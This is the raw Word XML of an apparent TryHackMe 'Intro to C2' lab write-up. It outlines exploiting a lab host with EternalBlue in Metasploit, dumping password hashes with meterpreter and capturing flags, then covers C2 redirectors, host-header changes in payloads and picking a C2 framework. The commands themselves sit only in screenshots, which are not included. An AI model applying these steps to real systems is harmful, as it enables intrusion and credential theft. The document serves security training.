          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="00061E4E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00061E4E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00061E4E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Eternal Blue exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061E4E" w:rsidRDefault="00A07D24" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2771374"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18" name="Picture 18" descr="C:\Users\shefali\Pictures\THM\6.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efali\Pictures\THM\6.1c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71374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E02DD" w:rsidRDefault="003E02DD" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00A07D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Dump hashes using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A07D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A07D24" w:rsidRDefault="00A07D24" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2642002"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="19" name="Picture 19" descr="C:\Users\shefali\Pictures\THM\6.2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efali\Pictures\THM\6.2c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42002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07D24" w:rsidRDefault="00A07D24" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3) Fetch flags for administrator and Ted account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07D24" w:rsidRDefault="00A07D24" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5200650" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20" name="Picture 20" descr="C:\Users\shefali\Pictures\THM\6.3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efali\Pictures\THM\6.3c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0650" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E02DD" w:rsidRDefault="003E02DD" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E02DD" w:rsidRPr="003E02DD" w:rsidRDefault="003E02DD" w:rsidP="003E02DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRPr="00745565" w:rsidRDefault="00675FA5" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675FA5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Task 7 Advanced C2 S</w:t>
      </w:r>
      <w:r w:rsidRPr="00745565">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">etups </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34" w:rsidRPr="00745565">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00745565" w:rsidRPr="00745565" w:rsidRDefault="00745565" w:rsidP="00745565">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745565">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command and Control Redirectors </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00745565" w:rsidRPr="00745565" w:rsidRDefault="00745565" w:rsidP="00745565">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745565">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>What is a Redirector?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00745565" w:rsidRPr="00745565" w:rsidRDefault="00745565" w:rsidP="00745565">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745565">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Before we dive into configuring a Redirector, first, what is it? A Redirector is exactly as it sounds. It's a server that "Redirects" HTTP/HTTPS requests based on information within the HTTP Request body. In production systems, you may see a "Redirector" in the form of a Load Balancer. This server often runs Apache 2 or NGINX. For this lab, we will be leveraging Apache and some of its modules to build a Redirector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00745565" w:rsidRPr="00745565" w:rsidRDefault="00745565" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Please do refer this room to read the full content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D74C0" w:rsidRDefault="001D74C0" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D74C0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5686425" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="24" name="Picture 24" descr="C:\Users\shefali\Pictures\THM\7.3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efali\Pictures\THM\7.3c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2352675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003221B4" w:rsidRPr="00CF5320" w:rsidRDefault="003221B4" w:rsidP="008E7C34">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Answer for </w:t>
      </w:r>
      <w:r w:rsidR="00CF5320">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF5320">
        <w:t xml:space="preserve">modify host header in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF5320">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF5320">
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="00F14BE7" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14BE7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="511742"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="22" name="Picture 22" descr="C:\Users\shefali\Pictures\THM\7.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efali\Pictures\THM\7.1c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11742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14BE7" w:rsidRDefault="00F14BE7" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14BE7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1683411"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23" name="Picture 23" descr="C:\Users\shefali\Pictures\THM\7.2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efali\Pictures\THM\7.2c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683411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="001D697E" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D697E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 8 Wrapping Up </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>How to Choose a C2 Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>After finishing this room, you may be left with some questions, and hopefully, one of them is "How do I know what C2 Framework to choose in my Red Team Operations"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> There is no right or wrong answer for this, just a few general question</w:t>
      </w:r>
      <w:r w:rsidR="00F24819">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s that you should answer first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    What are your goals? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Do you have a budget?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Do you need something highly customizable?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Is off-the-shelf AV Evasion necessary?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Do you need the ability to create your own modules/scripts?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="006E3D24" w:rsidP="006E3D24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3D24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Is built-in reporting necessary for you?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3D24" w:rsidRPr="006E3D24" w:rsidRDefault="00931499" w:rsidP="00931499">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931499">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You should then take that information to the C2 Matrix spreadsheet</w:t>
      </w:r>
      <w:r w:rsidR="0033431F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="0033431F" w:rsidRPr="00B319BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0033431F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00931499">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and narrow your selection based on the questions above. If you find a Premium C2 Framework that meets your criteria, it is highly recommended you request an evaluation/trial to find out if that C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 Framework works best for you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRDefault="008E7C34" w:rsidP="008E7C34">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E7C34" w:rsidRPr="009B43F1" w:rsidRDefault="00453F2D" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B43F1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>No Answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B625F" w:rsidRDefault="00802FAA" w:rsidP="003B625F">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00962E3B" w:rsidRDefault="00962E3B" w:rsidP="003B625F"/>
    <w:p w:rsidR="0050553D" w:rsidRPr="00FC648D" w:rsidRDefault="0050553D" w:rsidP="0050553D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D931DB">
        <w:t>That is all for this Write-up, hoping this will help you in solving the challen</w:t>
      </w:r>
      <w:r w:rsidR="00451CAA">
        <w:t>ges of Intro to C2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> room. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D931DB">
        <w:t>Have Fun and Enjoy Hacking!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D931DB">
        <w:t xml:space="preserve">Do visit other rooms and modules on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D931DB">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D931DB">
        <w:t xml:space="preserve"> for more learning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050553D" w:rsidRPr="00D931DB" w:rsidRDefault="0050553D" w:rsidP="0050553D">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-by Sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00D931DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efali Kumai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962E3B" w:rsidRDefault="00962E3B" w:rsidP="003B625F"/>
    <w:sectPr w:rsidR="00962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14A00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DAAF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BC"/>
    <w:rsid w:val="00020B43"/>
    <w:rsid w:val="0002746E"/>
    <w:rsid w:val="00040877"/>
    <w:rsid w:val="00053FD6"/>
    <w:rsid w:val="00061E4E"/>
    <w:rsid w:val="000A5049"/>
    <w:rsid w:val="000C7DD2"/>
    <w:rsid w:val="000F5766"/>
    <w:rsid w:val="001253A2"/>
    <w:rsid w:val="00127260"/>
    <w:rsid w:val="00142E14"/>
    <w:rsid w:val="001A67CB"/>
    <w:rsid w:val="001C420C"/>
    <w:rsid w:val="001D697E"/>
    <w:rsid w:val="001D74C0"/>
    <w:rsid w:val="00254A12"/>
    <w:rsid w:val="00266F31"/>
    <w:rsid w:val="00267AC4"/>
    <w:rsid w:val="002E7DA0"/>
    <w:rsid w:val="003079D7"/>
    <w:rsid w:val="0031439F"/>
    <w:rsid w:val="003169C8"/>
    <w:rsid w:val="003221B4"/>
    <w:rsid w:val="00324F6E"/>
    <w:rsid w:val="0033431F"/>
    <w:rsid w:val="0038327E"/>
    <w:rsid w:val="003845C1"/>
    <w:rsid w:val="00395163"/>
    <w:rsid w:val="003A7BF5"/>
    <w:rsid w:val="003B625F"/>
    <w:rsid w:val="003E02DD"/>
    <w:rsid w:val="003E05C2"/>
    <w:rsid w:val="003F469B"/>
    <w:rsid w:val="00433E80"/>
    <w:rsid w:val="00451CAA"/>
    <w:rsid w:val="00453F2D"/>
    <w:rsid w:val="004577B0"/>
    <w:rsid w:val="004620F7"/>
    <w:rsid w:val="00465F77"/>
    <w:rsid w:val="004712B3"/>
    <w:rsid w:val="00483DB7"/>
    <w:rsid w:val="004925FD"/>
    <w:rsid w:val="004B41CE"/>
    <w:rsid w:val="004C4158"/>
    <w:rsid w:val="004D044E"/>
    <w:rsid w:val="004E610B"/>
    <w:rsid w:val="0050553D"/>
    <w:rsid w:val="00505F3B"/>
    <w:rsid w:val="00511CE4"/>
    <w:rsid w:val="005A3EB8"/>
    <w:rsid w:val="005B2E1F"/>
    <w:rsid w:val="00622C41"/>
    <w:rsid w:val="0064388B"/>
    <w:rsid w:val="00647324"/>
    <w:rsid w:val="00675FA5"/>
    <w:rsid w:val="006B2D93"/>
    <w:rsid w:val="006C1CD5"/>
    <w:rsid w:val="006E3D24"/>
    <w:rsid w:val="007023DE"/>
    <w:rsid w:val="007215E7"/>
    <w:rsid w:val="00726179"/>
    <w:rsid w:val="00741DFA"/>
    <w:rsid w:val="00745565"/>
    <w:rsid w:val="007633A5"/>
    <w:rsid w:val="00777253"/>
    <w:rsid w:val="007D1424"/>
    <w:rsid w:val="00802FAA"/>
    <w:rsid w:val="0080700E"/>
    <w:rsid w:val="00843146"/>
    <w:rsid w:val="008A5AA4"/>
    <w:rsid w:val="008E7C34"/>
    <w:rsid w:val="0090242A"/>
    <w:rsid w:val="00904B41"/>
    <w:rsid w:val="00931499"/>
    <w:rsid w:val="00962E3B"/>
    <w:rsid w:val="00964719"/>
    <w:rsid w:val="009725F6"/>
    <w:rsid w:val="00972C09"/>
    <w:rsid w:val="009759C1"/>
    <w:rsid w:val="00985918"/>
    <w:rsid w:val="009A7DA0"/>
    <w:rsid w:val="009B3428"/>
    <w:rsid w:val="009B43F1"/>
    <w:rsid w:val="009E33F4"/>
    <w:rsid w:val="00A07D24"/>
    <w:rsid w:val="00A62AFE"/>
    <w:rsid w:val="00AA4033"/>
    <w:rsid w:val="00AA7D38"/>
    <w:rsid w:val="00AC6BAA"/>
    <w:rsid w:val="00AF3228"/>
    <w:rsid w:val="00AF4210"/>
    <w:rsid w:val="00B05BFF"/>
    <w:rsid w:val="00B4549B"/>
    <w:rsid w:val="00BA64BB"/>
    <w:rsid w:val="00BB6F4E"/>
    <w:rsid w:val="00BB79FA"/>
    <w:rsid w:val="00BC20C6"/>
    <w:rsid w:val="00BD20FA"/>
    <w:rsid w:val="00C132B2"/>
    <w:rsid w:val="00C21302"/>
    <w:rsid w:val="00C35805"/>
    <w:rsid w:val="00CF5320"/>
    <w:rsid w:val="00D22D2A"/>
    <w:rsid w:val="00D91EF4"/>
    <w:rsid w:val="00D9738F"/>
    <w:rsid w:val="00E535EE"/>
    <w:rsid w:val="00EA3391"/>
    <w:rsid w:val="00ED2676"/>
    <w:rsid w:val="00EE0F64"/>
    <w:rsid w:val="00EE6C41"/>
    <w:rsid w:val="00F14BE7"/>
    <w:rsid w:val="00F16449"/>
    <w:rsid w:val="00F20BBE"/>
    <w:rsid w:val="00F24819"/>
    <w:rsid w:val="00F36F47"/>
    <w:rsid w:val="00F9760C"/>
    <w:rsid w:val="00FB000F"/>
    <w:rsid w:val="00FC70BC"/>
    <w:rsid w:val="00FE1943"/>
    <w:rsid w:val="00FF6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97135-691D-4CCA-981F-AED69DC5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2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5F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="graf">
    <w:name w:val="graf"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005055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343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hyperlink" Target="https://drive.google.com/file/d/1u-YmWl7cx3tO2vVjon0EtOGLXVCak2SJ/view"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s://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=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17</Pages>
  <Words>3388</Words>
  <Characters>19316</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>160</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22659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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>shefali</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-14T09:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-14T13:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>